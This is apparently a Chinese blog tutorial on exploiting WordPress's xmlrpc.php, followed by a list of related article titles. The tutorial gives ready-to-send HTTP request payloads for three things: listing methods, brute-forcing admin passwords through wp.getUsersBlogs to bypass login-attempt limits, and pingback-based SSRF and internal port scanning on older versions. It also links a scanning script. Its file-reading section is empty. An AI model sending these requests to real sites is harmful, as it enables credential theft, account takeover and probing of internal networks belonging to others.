WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以，你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时，XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。

0X01 激活XML-RPC

从3.5版本开始，XML-RPC功能默认开启。 早些版本，可通过如下方法激活：Settings > Writing > Remote Publishing and check the checkbox.

路径：http://example.com/wordpress/xmlrpc.php

0x02 查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

0x03 账号爆破

一般情况下，wordpress的管理后台都会设置账号登录失败次数限制，因此，可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破，也可以使用其他的方法。
构造请求包：

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

爆破成功会返回博客的内容：

0x03 SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。
构造请求包：

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL：http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

IP和端口存在，返回包中的<value><int>中的值大于0：

利用脚本：
https://github.com/FireFart/WordpressPingbackPortScanner

0x04 读取文件：

0x99 参考：

https://codex.wordpress.org/zh-cn:XML-RPC_Support
http://xmlrpc.com/
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/
http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

xmlrpc.php 漏洞利用相关推荐

1. 2021-08-22dc6靶机实战wp插件漏洞利用+suid提权+rockyou+sudo -l换命令写shell+nmap运行nse提权（转）

   靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnh ...

2. CORS漏洞利用检测和利用方式

   CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

3. 流行漏洞利用工具包瞄准Flash、Java和IE

   Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...

4. Flash Player漏洞利用Exploiting Flash Reliably

   以下消息来自幻影论坛[Ph4nt0m]邮件组   前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...

5. 溢出漏洞利用小结（基础）

   shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

6. 7. Vulnerability exploitation tools （漏洞利用工具 11个）

   Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...

7. ASP.net 资源请求漏洞利用工具PadBuster

   ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...

8. ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法

   ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...

9. S2-045漏洞利用工具解决方案

   S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...

最新文章

1. 数据结构之二叉树(遍历、建立、深度)
2. linux虚拟机网卡启动失败问题处理
3. 关于阿里面试的一个小题（推荐）
4. 【Mybatis框架】从零开始学Mybatis框架——使用示例
5. 聊聊在Go语言里使用继承的翻车经历
6. 手把手教你搭建FastDFS集群（中）
7. python流程图自动生成_python自动化办公 自动生成PPT通报
8. 由于找不到npptool.dll,无法继续执行代码
9. xp访问贡享显示指定服务器,XP访问Win10共享打印机指定的网络名不再可用解决方法...
10. 金融货币学笔记（米什金）第一章 为什么研究货币、银行与金融市场
11. 舒淇出席活动兴致低 否认收张震结婚请柬
12. 直方图实现快速中值滤波opencv
13. 古诗文欣赏-春夜宴桃李园序
14. CAD制图怎么绘制对称的图形？
15. 判断N维矩阵是否是Monge矩阵的Java实现
16. 高德地图坐标转换为具体地址
17. 平面构成基础知识(补习资料)
18. 产品研发管理体系和敏捷体系_敏捷产品管理和产品组合平台介绍
19. 巴老储备1300+亿刀现金流的背后秘密
20. Redis 过期策略和淘汰策略

热门文章

1. 一行代码添加P值的可视化技巧分享~~
2. 有没有人带？这些都是学习生信的一大助力！
3. macOS Big Sur Wi-Fi 网络无法连接如何解决
4. spring cloud alibaba微服务原理与实战_SpringBoot+Cloud全家桶微服务实战项目之文档型数据库MongoDB四...
5. RTX5 | 配置文件RTX_Config.h（三）
6. 【ES7(2016)】Array.prototype.includes()
7. url中 斜杠如何传输_如何在父子页面中传输数据(layer)
8. C++设计模式-访问者模式
9. Qt工作笔记-进程间的通信（通过QSharedMemory）
10. C++ 一个程序获取另一个程序Edit控件的内容